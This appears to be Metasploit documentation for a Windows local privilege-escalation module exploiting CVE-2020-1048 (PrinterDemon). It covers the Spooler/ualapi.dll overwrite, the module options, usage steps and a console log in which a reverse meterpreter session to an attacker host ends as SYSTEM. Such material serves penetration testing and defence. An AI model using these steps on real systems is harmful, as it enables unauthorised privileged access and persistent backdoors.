adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md
T
h00die 557a15a115 spelling fixes on docs
2023-10-10 14:46:18 -04:00

6.9 KiB
Raw Blame History

Vulnerable Application

Vulnerable versions for exploit All unpatched windows through version 2003

Introduction

This exploit relies on a bug where you can create a virtual printer and print to trusted locations on the filesystem. If a user chooses the default overwrite, it may create a permanent backdoor.

Basically, this exploit creates a print job that writes to a trusted location. By selecting the location C:\windows\system32\ualapi.dll we abuse the spooler service twice. The spooler will print to this location when it restarts, then it will load the DLL into itself when it restarts a second time. The DLL will then be running as SYSTEM.

When the printer is created, the target will show a pop-up saying a printer was created. A larger issue here is that the Spooler service does not like to stop. Trying sc stop Spooler does not stop the spooler. Killing the pid with a trusted process will kill it, but it restarts automatically. Using the pendingFileRenameOperations registry key also does not appear to work.

Verification Steps

Start msfconsole get session on a windows target that is not patched (and <= 2003) use windows/local/cve_2020_1048_printerdemon set session <session> set payload <payload> set lhost <lhost> set lport <lport> run Verify target reboots automagically if reboot target again (yest it has to reboot again Verify you get a session

Options

EXECUTE_DELAY The time between uploading and running the exploit. Default is 3 seconds, but high-latency networks may require more time.

EXPLOIT_NAME The name of the when it is uploaded to the target (%RAND% by default).

EXPLOIT_DIR Directory to use for file upload and linking; this should not already exist. (%RAND% by default)

OVERWRITE_DLL The remote location you would like to write to. Default is C:\windows\system32\ualapi.dll

PAYLOAD_NAME The filename to use for the payload binary (%RAND% by default). This is the name of the dll payload when uploaded to the remote host.

RESTART_TARGET This will restart the target to force the overwrite. YOU WILL LOSE YOUR SESSION unless you have a method of persistence. The dll will not be run until a second reboot.

WRITEABLE_DIR The directory to use the payload binary and uploaded payload. (%RAND% by default).

Scenarios

Tested on Windows10 x64 Release 1903

msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 2

[*] Started reverse TCP handler on 192.168.135.197:5555 
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 2 opened (192.168.135.197:5555 -> 192.168.132.134:49675) at 2020-08-24 12:15:07 -0500

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-CL5L2IH\msfuser
meterpreter > getsystem
[-] 2001: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 2...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2020_1048_printerdemon 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > show options

Module options (exploit/windows/local/cve_2020_1048_printerdemon):

 Name            Current Setting  Required  Description
 ----            ---------------  --------  -----------
 EXECUTE_DELAY   3                yes       The number of seconds to delay between file upload and exploit launch
 EXPLOIT_NAME                     no        The filename to use for the exploit binary (%RAND% by default).
 OVERWRITE_DLL                    no        Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).
 PAYLOAD_NAME                     no        The filename for the payload to be used on the target host (%RAND%.dll by default).
 RESTART_TARGET  true             yes       Restart the target after exploit (you will lose your session until a second reboot).
 SESSION         1                yes       The session to run this module on.
 WRITABLE_DIR                     no        Path to write binaries (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

 Name      Current Setting  Required  Description
 ----      ---------------  --------  -----------
 EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
 LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
 LPORT     4444             yes       The listen port


Exploit target:

 Id  Name
 --  ----
 0   Windows x64


msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set verbose true
verbose => true
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set disablepayloadhandler false
disablepayloadhandler => false
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set wfsdelay 600
wfsdelay => 600
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run

msf6 exploit(windows/local/cve_2020_1048_printerdemon) > set session 2
session => 2
msf6 exploit(windows/local/cve_2020_1048_printerdemon) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 2
[*] Build Number = 18362
[*] Uploading Payload
[*] Payload (5120 bytes) uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\UCPNtlof
[*] Sleeping for 3 seconds before launching exploit
[*] Uploading exploit to DESKTOP-CL5L2IH as C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Exploit uploaded on DESKTOP-CL5L2IH to C:\Users\msfuser\AppData\Local\Temp\JkrbEDShseh.exe
[*] Running Exploit
[*] Exploit output:
Printer created successfully
[*] Rebooting DESKTOP-CL5L2IH
[*] 192.168.132.134 - Meterpreter session 2 closed.  Reason: Died

After the auto-reboot, reboot again. The first reboot performs the overwrite; the second loads the dll.

[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 3 opened (192.168.135.197:4444 -> 192.168.132.134:49669) at 2020-08-24 12:19:49 -0500

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Reference in New Issue View Git Blame Copy Permalink